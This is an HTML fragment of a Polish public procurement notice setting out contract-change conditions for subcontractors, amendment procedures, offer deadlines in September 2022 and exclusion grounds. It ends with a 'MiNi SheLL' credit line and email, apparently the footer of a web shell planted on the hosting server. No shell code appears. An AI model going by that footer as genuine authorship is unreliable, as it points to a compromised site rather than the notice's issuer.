<br/>3) Zmianie podwykonawcy - podmiotu, na którego zasoby Wykonawca <br/>powoływał się w złożonej ofercie, na zasadach określonych w art. 462 <br/>ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu <br/>- w przypadku akceptacji przez Zamawiającego wskazanego innego <br/>podwykonawcy po wykazaniu, iż proponowany inny podwykonawca spełnia <br/>je w stopniu nie mniejszym niż podwykonawca na którego zasoby <br/>Wykonawca się powołuje w trakcie postępowania o udzielenie zamówienia. <br/>4) Rezygnacji z podwykonawcy - podmiotu, na którego zasoby Wykonawca <br/>powoływał się w złożonej ofercie, na zasadach określonych w art. 462 <br/>ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu <br/>- w przypadku wykazania Zamawiającemu, iż Wykonawca samodzielnie <br/>spełnia je w stopniu nie mniejszym niż podwykonawca na którego zasoby <br/>Wykonawca się powołuje w trakcie postępowania o udzielenie zamówienia. <br/>5) Wszelkie dopuszczalne prawem zmiany umowy nastąpić mogą z inicjatywy <br/>Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie <br/>propozycji zmian w formie pisemnej, które powinny zawierać: <br/>a) opis zmiany, <br/>b) uzasadnienie zmiany, <br/>c) czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy <br/>bądź wynagrodzenia. <br/>6) Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie <br/>powstałych okoliczności w formie opisowej i właściwie umotywowanej <br/>(protokół wraz z uzasadnieniem) przez komisję techniczną powołaną przez <br/>Zamawiającego, w składzie której będą m.in. inspektor nadzoru oraz <br/>kierownik budowy. <br/>2. Zmiany, o których mowa w pkt. 1 mogą dotyczyć wszystkich istotnych <br/>postanowień umowy, w tym w szczególności w zakresie wysokości <br/>wynagrodzenia, terminu realizacji, harmonogramu, itp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.sidaspzp.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-23 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę <br/>w stosunku do którego zachodzą okoliczności określone w art. 108, ust. 1 <br/>ustawy Pzp oraz w art.7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r <br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wpieraniu agresji <br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego <br/>(Dz. U. z 2022 r. poz. 835).

Creat By MiNi SheLL
Email: jattceo@gmail.com